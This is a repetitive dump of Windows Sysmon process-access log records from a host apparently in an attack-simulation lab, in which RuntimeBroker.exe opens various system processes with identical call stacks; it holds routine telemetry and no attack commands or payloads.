12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
